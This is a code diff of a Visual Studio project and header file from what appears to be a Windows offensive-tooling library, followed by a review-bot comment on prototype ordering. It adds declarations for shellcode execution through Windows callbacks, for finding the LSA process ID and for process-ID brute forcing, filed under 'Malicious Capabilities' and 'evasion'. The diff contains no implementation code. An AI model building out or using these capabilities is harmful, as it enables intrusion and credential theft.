<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp" />
<ClCompile Include="StringCompare.cpp" />
<ClCompile Include="StringConcat.cpp" />
<ClCompile Include="StringCopy.cpp" />


@ -369,7 +369,7 @@
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="GetPidFromPidBruteForcingW.cpp">
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="TryLoadDllMultiMethod.cpp">
@ -381,7 +381,7 @@
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp">
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecViaCertEnumSystemStore.cpp">
@ -411,6 +411,12 @@
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
</ClCompile>
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">


@ -148,6 +148,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension);
DWORD GetPidFromNtQueryFileInformationW(_In_ PWCHAR FullBinaryPath);
DWORD GetPidFromNtQueryFileInformationA(_In_ PCHAR FullBinaryPath);
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension);
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension);
//malicious capabilities
DWORD OleGetClipboardDataA(_Inout_ PCHAR Buffer);
@ -167,6 +168,8 @@ BOOL ShellcodeExecViaEnumChildWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
BOOL ShellcodeExecViaEnumDateFormatsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDesktopWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDesktopsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
DWORD MpfGetLsaPidFromNamedPipe(VOID);
//evasion
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
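Review bot: MpfGetLsaPidFromNamedPipe is declared in the middle of the ShellcodeExecVia* group rather than beside the other MpfGetLsaPid* prototypes (not in this hunk, presumably earlier under the same `//malicious capabilities` heading), which groups by commit rather than by function and makes the LSA-PID family harder to find. The new prototypes also say nothing about their return contract, which per the implementations in this commit is a PID with 0 meaning "no match or failure" for the GetPidFromPidBruteForcingEx pair and 0 or (DWORD)-1 on failure for MpfGetLsaPidFromNamedPipe; a one-line comment above each, e.g. `// returns the PID, or 0 when no process matched / on failure`, would spare readers a trip into the .cpp files.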